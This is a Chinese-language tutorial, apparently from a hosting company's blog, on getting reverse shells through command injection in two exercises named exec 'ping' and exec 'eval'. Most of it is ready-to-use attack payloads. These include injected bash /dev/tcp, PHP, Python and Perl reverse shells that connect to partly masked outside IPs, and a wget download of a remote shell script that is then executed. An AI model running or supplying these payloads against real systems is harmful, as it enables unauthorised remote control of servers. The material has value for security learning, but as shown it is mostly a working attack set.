您好,登錄后才能下訂單哦!
這篇文章主要講解了“怎么反彈shell”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“怎么反彈shell”吧!
whoami是www-data權(quán)限,很低的權(quán)限;
pwd可查看到當(dāng)前路徑且判定是linux系統(tǒng);
ls -al查看了下當(dāng)前目錄下的讀寫執(zhí)行權(quán)限:
可以看出其他用戶是沒有高權(quán)限的,寫入執(zhí)行權(quán)限都沒有,就不能在當(dāng)前目錄下寫馬;經(jīng)嘗試,bash反彈shell未能成功。
第一題:exec "ping"
/tmp下有可寫可執(zhí)行權(quán)限,那么寫個(gè)bash反彈腳本上去:
127.0.0.1|Echo ‘bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1’>/tmp/cdk.sh
Vps上先監(jiān)聽,然后bash執(zhí)行腳本:
127.0.0.1|bash /tmp/cdk.sh
Payload:
127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
Payload:
127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Payload1(依賴/bin/sh):
127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Payload2(不依賴/bin/sh):
127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
第二題:exec "eval"
自己服務(wù)器上寫個(gè)反彈shell的sh,利用wget下載到目標(biāo)服務(wù)器,避免傳輸過程發(fā)生格式問題。
利用python啟用http服務(wù)。
執(zhí)行命令:
system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')
執(zhí)行腳本,成功反彈shell:
system("bash /tmp/drinkwater.sh");
感謝各位的閱讀,以上就是“怎么反彈shell”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)怎么反彈shell這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。